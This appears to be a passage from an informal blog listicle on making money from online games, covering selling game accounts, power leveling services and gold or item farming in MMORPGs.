If you are bored with your character, then you should sell it to make money. Sell your account to those gamers that doesn't have the time to grind levels, reputation and/or farm mobs, leveling/gearing and such. I know some guys actually make a living selling their accounts, but they are priced based on how bad ass your character is, the more it kicks butts with insane items the higher its price.

4. Power leveling services.

Back then when I was an addict online gamer, I usually offer this kind of service. Some people do spend most of their waking lives playing games and some spend most of their time leveling characters that are not their own.

5. Gold, item farming.

Grind tons of mobs, run countless dungeons, and raid instances for gold and items. With tons of MMO's out there that focus on leveling and gear for progression, a trend has risen to be efficient in making money from games.

Here are some gold sellers for various MMORPG.
